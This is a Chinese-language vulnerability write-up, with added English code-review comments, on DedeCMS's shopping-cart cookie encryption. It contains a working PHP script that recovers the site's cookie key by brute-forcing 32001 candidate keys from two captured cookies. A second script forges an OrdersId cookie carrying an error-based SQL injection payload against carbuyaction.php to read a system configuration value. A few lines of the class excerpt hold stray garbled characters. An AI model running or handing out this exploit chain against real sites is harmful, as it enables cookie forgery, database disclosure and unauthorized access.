www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中，先看一下 shopcar 类是如何生成 cookie 的：
/**
 * Stores a shopping-cart value in a cookie.
 *
 * Arrays are first flattened by enCode() (described in the surrounding text as
 * array -> a=b&c=d) and then passed through enCrypt(); scalars go straight to
 * enCrypt(). The cookie lives for 36000 seconds (10 hours) and is scoped to
 * path '/'.
 *
 * @param string $key   Cookie name.
 * @param mixed  $value Array or scalar payload.
 *
 * NOTE(review): setcookie() is called without the secure/httponly flags.
 * More importantly, enCrypt() (below) provides no integrity protection, so a
 * client who recovers the site key can forge any value stored here.
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        // enCode() is not shown in this excerpt.
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    setcookie($key,$value,time()+36000,'/');
}
简单地说，$key 就是 cookie 的名字，$value 就是 cookie 的值；enCode 的作用是把数组转成 a=yy&b=cc&d=know 这样的形式。关键在 enCrypt 函数：
/**
 * "Encrypts" $txt for storage in a cookie.
 *
 * A per-call 32-char key is derived from md5(rand(0, 32000)). For every
 * plaintext byte the output holds TWO bytes: the key byte itself, then
 * plaintext ^ key byte. The result is XOR-ed once more with the site-wide key
 * by setKey() and base64-encoded.
 *
 * @param  string $txt Plaintext (for arrays, the enCode()d form).
 * @return string      base64 cookie value.
 *
 * NOTE(review): this construction is the root cause of the cookie forgery
 * described in this write-up:
 *  - rand(0, 32000) yields only 32001 possible per-call keys, so $tmp can be
 *    enumerated by an attacker who knows $txt (the cart contents);
 *  - the per-call key byte is written into the output next to every
 *    ciphertext byte, so it adds no secrecy at all;
 *  - setKey() is a fixed-key repeating XOR with no integrity check, so once
 *    that key is recovered arbitrary cookies can be forged.
 * srand()/rand() are not cryptographic PRNGs in any case.
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));   // 32 lowercase hex chars, only 32001 candidates
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;   // wrap the key index every 32 bytes
        // key byte in the clear, then plaintext byte XOR key byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XORs $txt with the site-wide key md5(strtolower($cfg_cookie_encode)),
 * cycling through its 32 characters.
 *
 * @param  string $txt Bytes to transform (applying it twice restores the input).
 * @return string      Transformed bytes, same length as $txt.
 *
 * NOTE(review): a repeating-key XOR. Any 32 consecutive output bytes XOR-ed
 * with the corresponding known input bytes reveal the whole key, and there is
 * no MAC, so the cookie can be rewritten at will once the key is known.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));   // always 32 lowercase hex chars
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt（购物车明文）我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp。这个参数在某种意义上我们也是可知的：因为 $encrypt_key = md5(rand(0, 32000)) 只有 32001 种可能（0 到 32000，闭区间），我们可以枚举出 32001 种可能的 $tmp，再和 cookie 解码后的值逐字节异或，就推出 32001 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的就是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造购物车的 cookie。md5() 的返回值固定是 32 个小写十六进制字符，所以从这 32001 个候选里过滤掉含非 [0-9a-f] 字符的，就只剩下少量候选 key；然后再重新下一次订单，再得到一批候选 key，两次取交集，得到最终的 key。
具体代码如下：
<?php
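// Inputs for the key-recovery script below.
// $cookie1 / $cookie2: the cart cookie values captured from two separate
// orders with the same cart contents (same plaintext, two different per-call
// keys). Each decodes to 2 * strlen($plantxt) bytes, because enCrypt() emits
// a key byte next to every plaintext byte.
$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // here is the first cookie, change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // here is the second cookie, change here
// $plantxt: the enCode()d cart entry those cookies were built from; rebuild
// it from the product page (id, price, units, buynum, title).
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text, change here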
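/**
 * Recovers a candidate site key from one cookie and one candidate $tmp.
 *
 * setKey() computes out[i] = tmp[i] ^ key[i % 32], so when $string is the
 * correct $tmp for this cookie, out[i] ^ string[i] for i < 32 is the key.
 *
 * @param  string $code   base64 cookie value as received from the server.
 * @param  string $string Candidate $tmp (plaintext interleaved with a guessed per-call key).
 * @param  int    $keyLen Key length to extract; 32 for an md5 hex key.
 * @return string         Candidate key, or '' when the cookie is not valid
 *                        base64 or either input is shorter than $keyLen
 *                        (the caller's regex filter rejects '').
 */
function reStrCode($code, $string, $keyLen = 32)
{
    // Strict decoding: a cookie that was mangled in transit (e.g. '+' turned
    // into a space) would otherwise silently yield a shifted, useless key.
    $raw = base64_decode($code, true);
    // Reading past the end of either string only produces warnings and a
    // truncated key; bail out explicitly instead.
    if ($raw === false || strlen($raw) < $keyLen || strlen($string) < $keyLen) {
        return '';
    }
    $key = '';
    for ($i = 0; $i < $keyLen; $i++) {
        $key .= $string[$i] ^ $raw[$i];
    }
    return $key;
}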
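/**
 * Enumerates every per-call key enCrypt() could have used and returns the
 * site-key candidates that are consistent with $cookie.
 *
 * For each seed j in [0, $maxSeed] the candidate $tmp is rebuilt exactly as
 * enCrypt() builds it (key byte, then plaintext ^ key byte), XOR-ed against
 * the decoded cookie to get a 32-byte key, and kept only if
 *   - it looks like an md5 hex digest ([0-9a-f]{32}), and
 *   - the same key also explains every later byte of the cookie (setKey()
 *     repeats its key every 32 bytes), which discards most false positives.
 *
 * @param  string $cookie  base64 cookie value from the server.
 * @param  string $plantxt The plaintext that was encrypted into $cookie.
 * @param  int    $maxSeed Largest seed to try (inclusive). enCrypt() uses
 *                         rand(0, 32000), so the default covers all 32001
 *                         values; the original loop stopped at 31999 and
 *                         could miss the key.
 * @return string[]        Distinct candidate keys, also echoed one per line.
 */
function getKeys($cookie, $plantxt, $maxSeed = 32000)
{
    $raw = base64_decode($cookie, true);
    $len = strlen($plantxt) * 2;               // enCrypt() emits two bytes per plaintext byte
    if ($raw === false || strlen($raw) < $len || $len < 32) {
        return array();                        // cannot recover a full 32-byte key from this
    }
    $results = array();
    for ($j = 0; $j <= $maxSeed; $j++) {
        $innerKey = md5($j);
        // Rebuild $tmp as enCrypt() would have for this seed.
        $tmp = '';
        $ctr = 0;
        for ($i = 0; $i < strlen($plantxt); $i++) {
            $ctr = $ctr == 32 ? 0 : $ctr;
            $tmp .= $innerKey[$ctr] . ($plantxt[$i] ^ $innerKey[$ctr++]);
        }
        // Undo setKey(): raw[i] ^ tmp[i] == siteKey[i % 32].
        $key = '';
        for ($i = 0; $i < 32; $i++) {
            $key .= $raw[$i] ^ $tmp[$i];
        }
        if (!preg_match('/^[0-9a-f]{32}$/', $key)) {
            continue;                          // md5() output is lowercase hex only
        }
        // The key must repeat consistently over the rest of the cookie.
        $consistent = true;
        for ($i = 32; $i < $len; $i++) {
            if (($raw[$i] ^ $tmp[$i]) !== $key[$i % 32]) {
                $consistent = false;
                break;
            }
        }
        if ($consistent && !in_array($key, $results, true)) {
            echo $key . "\n";
            $results[] = $key;
        }
    }
    return $results;
}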
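// Run the enumeration for both captured cookies and keep only the keys that
// explain both. The two orders used independent per-call keys, so the false
// positives of each run practically never coincide and the intersection is
// the real md5(strtolower($cfg_cookie_encode)).
$results1 = getKeys($cookie1, $plantxt);
$results2 = getKeys($cookie2, $plantxt);
print "\n-------------------- real key --------------------\n";
$realKeys = array_values(array_intersect($results1, $results2));
if (count($realKeys) === 0) {
    print "no common key found - check the cookies and plantxt\n";
}
foreach ($realKeys as $key) {
    echo $key . "\n";
}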
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后就能推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，由于 setKey 只是固定 key 的异或、没有任何完整性校验，我们就可以构造任意购物车的 cookie。
接着看 MemberShops 类：
20 class MemberShops
$ z0 k7 L* @) D21 {
: U, u$ G7 q( u, r5 Q% L% C5 a22 var $OrdersId;( x2 R: \5 M3 H. j* N3 ]2 Q7 g5 `+ k
23 var $productsId;
# o7 v$ D5 f' ^$ V24
/**
 * Loads the current order id from the "OrdersId" cookie, creating a new order
 * via MakeOrders() when the cookie is absent or empty.
 *
 * NOTE(review): the cookie value is accepted after nothing more than an
 * empty() check; nothing here validates its shape, and the cookie format
 * (enCrypt/setKey in this file) carries no integrity check, so a client who
 * has recovered the site key controls $this->OrdersId completely. getCookie()
 * and MakeOrders() are not shown in this excerpt, so whether either of them
 * validates the value cannot be confirmed here.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
可以看到 OrdersId 是直接从 cookie 里取出来的，只做了 empty() 判断，没有任何格式校验。
然后看 /plus/carbuyaction.php 中的：
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id for this request -- taken from the "OrdersId" cookie in MemberShops::__construct()
// ... (lines 40-172 of carbuyaction.php omitted in the write-up)
// NOTE(review): $OrdersId is interpolated straight into the SQL string. It
// originates from a client-controlled cookie that is not validated anywhere
// shown here, so this is an SQL injection point; it should be bound as a
// parameter, or at least validated against the exact format MakeOrders()
// produces, before it reaches the query.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
$OrdersId 就这样直接拼进了 SQL 语句，接着我们就可以注入了。
通过下面的代码生成用于注入的 cookie：
<?php
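// Payload to embed in the forged OrdersId cookie. This is the SQL-injection
// string from the write-up (the floor(rand(0)*2)/group by duplicate-key
// technique, reading a #@__sysconfig row), reproduced verbatim. Use it only
// against systems you are authorised to test.
$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
// md5(strtolower($cfg_cookie_encode)) recovered by the previous script:
// 32 lowercase hex characters. Replace it with the value found for the target.
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here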
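/**
 * Re-implementation of DedeCMS shopcar::setKey(): repeating-key XOR with the
 * 32-character site key.
 *
 * @param  string      $txt Bytes to transform (applying it twice restores the input).
 * @param  string|null $key Key to use; defaults to the global $encrypt_key so
 *                          existing callers keep working.
 * @return string           Transformed bytes, same length as $txt ('' for an
 *                          empty key, as the original produced).
 */
function setKey($txt, $key = null)
{
    global $encrypt_key;
    if ($key === null) {
        $key = $encrypt_key;
    }
    $keyLen = strlen($key);
    if ($keyLen === 0) {
        return '';
    }
    $out = '';
    for ($i = 0; $i < strlen($txt); $i++) {
        $out .= $txt[$i] ^ $key[$i % $keyLen];
    }
    return $out;
}

/**
 * Re-implementation of DedeCMS shopcar::enCrypt(): interleaves each plaintext
 * byte with a per-call key byte, applies setKey(), base64-encodes.
 *
 * @param  string   $txt  Plaintext to wrap in a cookie.
 * @param  int|null $seed Per-call key seed (the key is md5($seed)); null picks
 *                        one at random from the same range the original uses.
 *                        A fixed seed makes the output deterministic, which is
 *                        convenient when a caller has to avoid certain base64
 *                        characters in the cookie value.
 * @return string         base64 cookie value accepted by the target's setKey().
 */
function enCrypt($txt, $seed = null)
{
    if ($seed === null) {
        $seed = mt_rand(0, 32000);   // secrecy of the per-call key is irrelevant for forging
    }
    $innerKey = md5($seed);
    $tmp = '';
    $ctr = 0;
    for ($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == strlen($innerKey) ? 0 : $ctr;
        // key byte in the clear, then plaintext byte XOR key byte -- exactly what the target expects
        $tmp .= $innerKey[$ctr] . ($txt[$i] ^ $innerKey[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}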
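// Keep generating until the base64 value contains no '+' anywhere. The
// write-up does not say why '+' is avoided; presumably because '+' in a
// URL-encoded cookie value decodes to a space on the server. The original
// test `!strpos($dest, '+')` also let a '+' at offset 0 through.
do {
    $dest = enCrypt($txt);
} while (strpos($dest, '+') !== false);
echo $dest . "\n";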